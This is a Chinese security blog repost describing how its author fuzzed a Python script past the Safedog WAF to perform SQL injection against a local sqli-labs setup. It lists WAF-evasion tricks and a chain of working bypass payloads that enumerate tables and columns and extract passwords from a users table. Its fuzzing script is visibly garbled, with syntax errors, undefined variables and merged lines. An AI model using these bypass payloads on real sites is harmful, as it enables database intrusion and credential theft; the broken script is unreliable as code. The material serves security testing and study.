记一次Fuzz绕WAF实现SQL 注入

admin 2022年5月18日09:00:04安全文章评论31 views1977字阅读6分35秒阅读模式

0×00简介

本文使用自己编写的Python脚本,实现绕过某WAF限制,实现SQL注入。先解释一下Fuzz概念,Fuzz是安全测试的一种方法,面对waf无所适从的时候,可以使用Fuzz模糊测试来绕过waf,甚至你可以发现一些意想不到的payload语句。

0×01SQL注入绕waf常用的方法

使用大小写绕过 例如:

使用注释符/**/ #绕过

使用/!**/绕过

根据数据库特性进行绕过,例如mysql数据,使用/*!5000 union select x,x,x/

更改user-agent

…….

0×02 使用/**/结合Fuzz绕过

先组建好sql注入本地测试平台,在服务器中安装某WAF狗。本文使用的中间件为apache和数据库是mysql,首先安装配置安全狗,在此之前需要安装好phpstudy。

记一次Fuzz绕WAF实现SQL 注入

访问搭建好的SQL注入平台.

记一次Fuzz绕WAF实现SQL 注入

先进行测试过程为:?id=1’ union select 1,2,3—+ 拦截 。

?id=1’ /union /select 1,2,3—+ 拦截 。

?id=1’ /union / 1,2,3—+ 不拦截

?id=1’ union 1,2,3—+不拦截

?id=1’ select 1,2,3—+不拦截

说明union和select在一起会拦截

使用/%0a/union/%0a/select/%0a/1,2,3—+ 拦截 PS:%0a是换行意思

记一次Fuzz绕WAF实现SQL 注入

那么这个时候可以使用python脚本进行fuzz测试了。测试替换脚本为%0a,%23代码如下:

From urllib import requests
import time
url='http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1'
union='union'
select='select'
num='1,2,3'
l={'%0a','%23'}
ll={'S'}
lll={'%0a','%23'}
x='/*!'
f='*/'
def bypass():
for xiaofei in a:6t
for xiaofeii in ll:
for xiaofeiii inlll:
for two in range(?,?): #?自己指定步长
urls=url+xiaofei+xiaofeii+xiaofeiii+ll+str(two)+union+lll+xiaofei+xiaodis+xiaofeii+select+xiaofei+xiaofeii+xiaofeiii+num
try:
result=requests.get(urls).text
len_r=len(result) #len() 方法返回对象(字符、列表、元组等)长度或项目个数。
if (result.find('safedog') == -1):#print('bypass url addreess:' + urls + '|' + str(len_r))print('bypass url addreess:'+urls+'|'+str(len_r))if len_r==715:fp = open('url.txt', 'l+')
fp.write(urls + 'n')
fp.close()
except Exception as err:
print('connecting error')
time.sleep(0.1)
if __name__ == '__main__':
print('fuzz strat!')
bypass()

0×03 测试结果

测试结果为:

http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1/S%0a/union/x%0a/select/x%0a/ 1,2,3没有被拦截。

记一次Fuzz绕WAF实现SQL 注入

0×04 扩展

同样利用其他方法进行爆破,下面是payload。

?id=1’ /!20000order/by 3–+?id=-1’ union /!00000all select/ 1,2,3–+?id=-1union /!00000all select/ 1,database/**/(),3–+?id=-1union /!00000all/ /!00000select 1,2,table_name from/ information_schema.tables where table_schema=‘securitylimit 3,1 --+?id=-1union /!00000all/ /!00000select 1,2,column_name from/ information_schema.columns where table_name=‘userslimit 2,1 --+?id=-1union /!00000all/ /!00000select 1,2,password from/ users limit 1,1 --+
记一次Fuzz绕WAF实现SQL 注入
作者:liangxiaofei,文章来源于FreeBuf.COM

原文始发于微信公众号(菜鸟学信安):记一次Fuzz绕WAF实现SQL 注入

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月18日09:00:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次Fuzz绕WAF实现SQL 注入 http://cn-sec.com/archives/1016363.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: